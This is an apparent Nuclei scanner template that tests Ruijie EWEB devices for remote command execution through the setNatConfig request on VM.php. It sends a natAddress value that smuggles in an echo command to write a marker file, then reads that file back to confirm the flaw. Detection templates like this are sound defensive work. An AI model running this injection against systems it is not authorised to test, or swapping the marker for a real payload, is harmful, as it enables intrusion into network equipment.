id: ruijieEWEB-setNatConfig-rce
info:
  name: ruijieEWEB-setNatConfig-rce
  author: Uniview
  severity: critical
  tags: ruijieEWEB

http:
  - raw:
      # 第一个请求：POST写入文件
      - |
        POST /Interface/DevManage/VM.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
        Content-Length: 52
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Cookie: PHPSESSID=5b1d2622cb07bac9ec8eedbfa3c42865; logintime=-; devLanguage=zh-CN
        Upgrade-Insecure-Requests: 1

        cmd=setNatConfig&natAddress=%26echo%20sectest2026%20>sectest.txt
      
      # 第二个请求：GET读取写入的文件
      - |
        GET /Interface/DevManage/sectest.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
        Connection: close
        Accept-Encoding: gzip

    # 匹配规则：仅校验第二个请求的响应
    matchers:
      - type: word
        # 指定匹配第二个请求的响应
        part: body_2
        # 匹配的关键字
        words:
          - "sectest2026"